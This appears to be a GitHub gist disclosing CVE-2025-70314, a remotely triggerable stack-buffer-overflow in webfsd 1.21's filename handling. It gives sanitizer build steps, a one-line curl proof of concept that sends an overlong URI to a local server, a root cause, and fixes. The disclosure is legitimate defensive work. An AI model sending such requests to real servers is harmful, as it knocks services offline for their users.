Skip to content

Instantly share code, notes, and snippets.

@Err0rzz

Err0rzz/CVE-2025-70314.md

Created February 9, 2026 03:04
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Err0rzz/3afe49f54e1121b8a08a69801b61cfcc to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Err0rzz/3afe49f54e1121b8a08a69801b61cfcc to your computer and use it in GitHub Desktop.
Download ZIP
Reference for CVE-2025-70314
Raw
CVE-2025-70314.md

Vulnerability Report

Project

Summary

webfsd can be crashed remotely by an unauthenticated client via a specially crafted very long HTTP request URI. When compiled with AddressSanitizer/UndefinedBehaviorSanitizer, the server reports an out-of-bounds index and an ASan stack-buffer-overflow involving the stack variable filename, then aborts.

Affected Version(s)

  • Confirmed
    • VERSION: 1.21
    • git rev-parse HEAD: c51981b8b57d62c83c15045f84731cc839be4f1a
    • git describe --tags --always: 1.21-12-gc51981b

Impact

  • Remote unauthenticated Denial of Service (DoS) via process abort/crash.

Reproduction Environment

  • Linux (recommended): Debian bullseye or compatible — ASan/UBSan support is most reliable on Linux.
  • macOS: May work; if linking fails with undefined sanitizer symbols, add LDFLAGS='-fsanitize=address,undefined'.
  • clang build with: -O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined and defines -DMIMEFILE and -DWEBFS_VERSION.
  • Server listens on port 8000, docroot /tmp/docroot.

Real-World Attack Scenario

In practice, an attacker only sends a malicious HTTP request. The attacker has no filesystem access and does not create any directories on the server. The overflow occurs during request parsing when the server constructs the path. The steps below use a minimal setup; the long-path directory is optional and may help trigger the vulnerable code path in some configurations.

Steps to Reproduce

1. Clone webfsd and check out the affected version

git clone https://github.com/ourway/webfsd.git && cd webfsd
git checkout c51981b8b57d62c83c15045f84731cc839be4f1a

2. Build with ASan/UBSan

Use single quotes around CFLAGS so shell does not strip the macro string literals. Add LDFLAGS so the sanitizer runtime is linked.

Linux:

make clean && make CC=clang \
  CFLAGS='-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined -DMIMEFILE=\"/etc/mime.types\" -DWEBFS_VERSION=\"1.21\"' \
  LDFLAGS='-fsanitize=address,undefined'

macOS:

make clean && make CC=clang \
  CFLAGS='-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined -DMIMEFILE=\"/usr/share/cups/mime/mime.types\" -DWEBFS_VERSION=\"1.21\"' \
  LDFLAGS='-fsanitize=address,undefined'

3. Create docroot (and optionally a long-path directory to ensure the vulnerable code path is reached)

mkdir -p /tmp/docroot

4. Start the server

./webfsd -F -p 8000 -r /tmp/docroot

5. Send long-path request (in another terminal; attacker needs no filesystem access)

curl -v "http://127.0.0.1:8000/$(python3 -c "print('A'*2040)")/"

6. Observe the server crashes and outputs an ASan/UBSan report on stderr.

Evidence

Figure 1 — UBSan/ASan report: stack-buffer-overflow in filename (request.c:353) poc1

Figure 2 — Process abort and empty reply from server

poc1_abort

Root Cause (high level)

During request parsing / filename construction, a fixed-size stack buffer (filename) is accessed without enforcing a strict upper bound for very long request URIs, resulting in out-of-bounds access and a stack-buffer-overflow.

Suggested Fix

  • Enforce a strict maximum length for request URI/path early and reject overlong requests.
  • Avoid unbounded concatenation/copy into stack buffers; use snprintf (or equivalent) and check return values.
  • Add explicit bounds checks in code paths constructing/using filename.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment